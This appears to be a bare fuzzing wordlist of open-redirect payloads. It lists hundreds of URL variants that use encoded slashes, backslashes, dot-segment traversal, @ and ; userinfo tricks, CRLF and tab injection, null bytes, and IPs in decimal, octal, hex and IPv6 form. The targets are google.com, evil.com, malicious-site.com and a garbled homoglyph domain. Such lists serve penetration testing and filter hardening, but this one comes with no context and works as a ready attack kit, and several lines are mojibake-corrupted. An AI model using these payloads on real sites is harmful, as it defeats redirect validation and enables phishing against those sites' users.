////â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
//%2f%2fâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%2f%2fâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
%2f$2f216.58.214.206
$2f%2f216.58.214.206%2f%2f
%2f$2f3627734734
$2f%2f3627734734%2f%2f
//%2f%2fgoogle.com
/%2f%2fgoogle.com
$2f%2fgoogle.com
%2f$2fgoogle.com
$2f%2fgoogle.com%2f%2f
%2f3627734734//
%2f3627734734
%2f3627734734%2f%2f
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
%2fgoogle.com//
%2fgoogle.com
%2fgoogle.com%2f%2f
////3627734734
///3627734734
//3627734734
/\3627734734
/3627734734
3627734734
////%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
///%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
//%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
////%5cgoogle.com
///%5cgoogle.com
//%5cgoogle.com
/%5cgoogle.com
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
//google%00.com
/\google%252ecom
google%252ecom
<>//google.com
/<>//google.com
//;@google.com
///;@google.com
/////google.com/
/////google.com
////\;@google.com
////google.com//
////google.com/
////google.com
///\;@google.com
///google.com//
///google.com/
///google.com
//\/google.com/
//\google.com
//google.com//
//google.com/
//google.com
/.google.com
/\/\/google.com/
/\/google.com/
/\/google.com
/\google.com
/ã€±google.com
/google.com
../google.com
.google.com
@google.com
\/\/google.com/
ã€±google.com
google.com
////google.com/%2e%2e
///google.com/%2e%2e
//google.com/%2e%2e
/google.com/%2e%2e
//google.com/%2E%2E
////google.com/%2e%2e%2f
///google.com/%2e%2e%2f
//google.com/%2e%2e%2f
////google.com/%2f..
#///\/\malicious-site.com/
#///\google.com/
#/path////\/\malicious-site.com
#/path////\google.com
%09//\/\malicious-site.com
%09//\google.com
%09http:///zeit.co%40/\/\malicious-site.com
%09http:///zeit.co%40/\google.com
%2F/\/\malicious-site.com
%2F/\google.com
%40/\/\malicious-site.com/
%40/\google.com/
%5c/\/\malicious-site.com
%5c/\google.com
///////////////////////\/\malicious-site.com
///////////////////////\google.com
/////\/\malicious-site.com/%2f%2e%2e/%2f%2e%2e
/////\google.com/%2f%2e%2e/%2f%2e%2e
////\/\malicious-site.com
////\/\malicious-site.com/?www.domain.com/?category=interview&page=2
////\google.com
////\google.com/?www.domain.com/?category=interview&page=2
///;@/\/\malicious-site.com
///;@/\google.com
///\/\malicious-site.com/
///\/\malicious-site.com/%2e%2e
///\google.com/
///\google.com/%2e%2e
//;@/\/\malicious-site.com
//;@/\google.com
//\/\malicious-site.com/
//\/\malicious-site.com/%2F..
//\/\malicious-site.com/%2f%2e%2e
//\/\malicious-site.com/%2f../
//\/\malicious-site.com/..;/css
//\google.com/
//\google.com/%2F..
//\google.com/%2f%2e%2e
//\google.com/%2f../
//\google.com/..;/css
<>///\/\malicious-site.com
<>///\google.com
@/\/\malicious-site.com
@/\google.com
http%3a%2f%2f/\/\malicious-site.com%2f
http%3a%2f%2f/\google.com%2f
http:///@/\/\malicious-site.com//localhost
http:///@/\google.com//localhost
http:///\/\malicious-site.com
http:///\google.com
https:/%5c/\/\malicious-site.com/
https:/%5c/\google.com/
https:///\/\malicious-site.com/EvilFile.xx
https:///\google.com/EvilFile.xx
///google.com/%2f..
//google.com/%2f..
//google.com/%2F.. 
/google.com/%2F.. 
////google.com/%2f%2e%2e
///google.com/%2f%2e%2e
//google.com/%2f%2e%2e
/google.com/%2f%2e%2e
//google.com//%2F%2E%2E
//google%E3%80%82com
/http://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/http:/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://;@â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://.â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http://00330.00072.0000326.00000316
http:00330.00072.0000326.00000316
http://00330.0x3a.54990
http:00330.0x3a.54990
http://00330.3856078
http:00330.3856078
http://0330.072.0326.0316
http:0330.072.0326.0316
http:%0a%0dâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
http:%0a%0dgoogle.com
http://0xd8.072.54990
http:0xd8.072.54990
http://0xd8.0x3a.0xd6.0xce
http:0xd8.0x3a.0xd6.0xce
http://0xd8.3856078
http:0xd8.3856078
http://0xd83ad6ce
http:0xd83ad6ce
http://[::216.58.214.206]
http:[::216.58.214.206]
http://3627734734
http:3627734734
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.3856078
http:3H6k7lIAiqjfNeN@00330.3856078
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http://3H6k7lIAiqjfNeN@472.314.470.462
http:3H6k7lIAiqjfNeN@472.314.470.462
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://472.314.470.462
http:472.314.470.462
/http://google.com
/http:/google.com
http://;@google.com
http://.google.com
http://google.com
http:/\/\google.com
http:/google.com
http:google.com
//https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦//
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https:â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%09/â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https://%09/google.com
https://%09/google.com
https://%0a%0dâ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https://%0a%0dgoogle.com
//https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e
//https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2e%2e%2f
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f..
/https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
/https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https:///â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https://â“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/%2f%2e%2e
https%3a%2f%2fgoogle.com%2f
/https://%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
/https:/%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
https://%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦
https:/%5câ“ğ¨ğ—°ï¿½ğ•â…†ğ“¸â“œâ‚â„¹â“ƒï½¡ï¼°â“¦/
/https://%5cgoogle.com
/https:/%5cgoogle.com/
https://%5cgoogle.com
https:/%5cgoogle.com/
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
//https://google.com//
/https://google.com//
/https://google.com/
/https://google.com
/https:google.com
https://////google.com
https://google.com//
https://google.com/
https://google.com
https:/\google.com
https:google.com
//https:///google.com/%2e%2e
/https://google.com/%2e%2e
https:///google.com/%2e%2e
//https://google.com/%2e%2e%2f
https://google.com/%2e%2e%2f
/https://google.com/%2f..
https://google.com/%2f..
/https:///google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
https:///google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.3856078
http:XY>.7d8T\205pZM@00330.3856078
http://XY>.7d8T\205pZM@0330.072.0326.0316
http:XY>.7d8T\205pZM@0330.072.0326.0316
http://XY>.7d8T\205pZM@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.3856078
http:XY>.7d8T\205pZM@0xd8.3856078
http://XY>.7d8T\205pZM@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http://XY>.7d8T\205pZM@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http://XY>.7d8T\205pZM@3627734734
http:XY>.7d8T\205pZM@3627734734
http://XY>.7d8T\205pZM@472.314.470.462
http:XY>.7d8T\205pZM@472.314.470.462
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
///http://evil.com/?www.domain.com/?category=interview&page=2
#/path///http://evil.com
//http://evil.com/
/http://evil.com/
///http://evil.com
http://http://evil.com
%2Fhttp://evil.com
/http://evil.com/..;/css
https:/%5chttp://evil.com/
/http://evil.com/%2f%2e%2e
%09http:///zeit.co%40http://evil.com
%5chttp://evil.com
/http://evil.com/%2f../
http%3a%2f%2fhttp://evil.com%2f
@http://evil.com
<>//http://evil.com
///;@http://evil.com
%40http://evil.com/
//;@http://evil.com
//http://evil.com/%2e%2e
/http://evil.com/%2F..
////http://evil.com/%2f%2e%2e/%2f%2e%2e
%09/http://evil.com
http:///@http://evil.com//localhost
https://http://evil.com/EvilFile.xx
//////////////////////http://evil.com
#//http://evil.com/




























